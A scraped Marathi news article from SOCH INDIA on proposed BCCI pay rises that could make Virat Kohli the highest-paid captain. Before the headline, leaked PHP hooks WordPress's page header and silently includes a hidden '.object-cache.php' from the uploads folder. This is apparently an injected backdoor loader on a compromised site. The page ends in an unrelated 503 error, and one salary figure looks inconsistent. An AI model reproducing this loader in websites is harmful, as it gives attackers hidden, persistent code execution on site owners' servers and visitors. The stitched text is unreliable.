add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); … तर कोहली ठरेल सर्वाधिक वेतन मिळवणारा कर्णधार – SOCH INDIA
Menu

खेल
… तर कोहली ठरेल सर्वाधिक वेतन मिळवणारा कर्णधार

nobanner

भारतीय क्रिकेट संघातील खेळाडूंच्या वेतनाची गेल्या काही दिवसांपासून चांगलीच चर्चा सुरु आहे. भारतीय संघाचा कर्णधार विराट कोहलीने वेतनामध्ये वाढ करावी, असा मुद्दा देखील उपस्थित केला होता. त्यानंतर माजी कर्णधार आणि एकदिवसीय संघाचा यष्टीरक्षक महेंद्रसिंह धोनी आणि प्रशिक्षक रवी शास्त्री यांनी खेळाडूंच्या वेतन वाढीसंबंधातील प्रस्ताव बीसीसीआयच्या सल्लागार समितीसमोर सादर करण्यात आला. या प्रस्तावाच्या माध्यमातून सल्लागार समितीकडे ‘अ’ श्रेणीतील खेळाडूंसाठी १२ कोटी, ‘ब’ श्रेणीतील खेळाडूंना ८ कोटी तर ‘क’ श्रेणीतील खेळाडूंना ४ कोटी वार्षिक वेतन मिळावे, अशी मागणी करण्यात आली आहे.
सध्याच्या घडीला ऑस्ट्रेलिया आणि इंग्लंडच्या खेळाडूंना सर्वाधिक वेतन मिळते. ऑस्ट्रेलियन कर्णधार स्टिव्ह स्मिथला वर्षाला १२ कोटी रुपये इतके वेतन दिले जाते. इंग्लंडचा कर्णधार जो रुटलाही जवळपास तेवढेच वेतन मिळते. त्यामुळे बीसीसीआयने वेतन वाढीचा प्रस्ताव मान्य केल्यास विराट कोहली सर्वाधिक वेतन मिळवणारा कर्णधार ठरेल. कारण विराट सध्या अ श्रेणीत आहे. संघाचे नेतृत्व करत असल्यामुळे इतर खेळाडूंच्यापेक्षा त्याला अधिक वेतन मिळेल. सध्या भारतीय संघातील अ श्रेणीतील खेळाडूंना २ कोटी, ब श्रेणीतील १ कोटी आणि क श्रेणीतील खेळाडूंना ५० हजार वार्षिक वेतन दिले जाते.

कर्णधार विराट कोहली, प्रशिक्षक रवी शास्त्री आणि महेंद्रसिंह धोनी बीसीसीआयसमोर हा मुद्दा उपस्थित करण्याच्या तयारीत असल्याची चर्चा काही दिवसांपासून रंगली होती. बीसीसीआय प्रशासकीय समिती अध्यक्ष आणि माजी कर्णधार सौरव गांगुली यांनी खेळाडूंच्या वेतन वाढीला समर्थन दिले होते. प्रत्येक क्षेत्रात वेतन वाढ केली जाते. इतर क्षेत्राप्रमाणे खेळाडूंच्या वेतनात देखील वाढ व्हायला हवी, असे मत त्यांनी व्यक्त केले आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.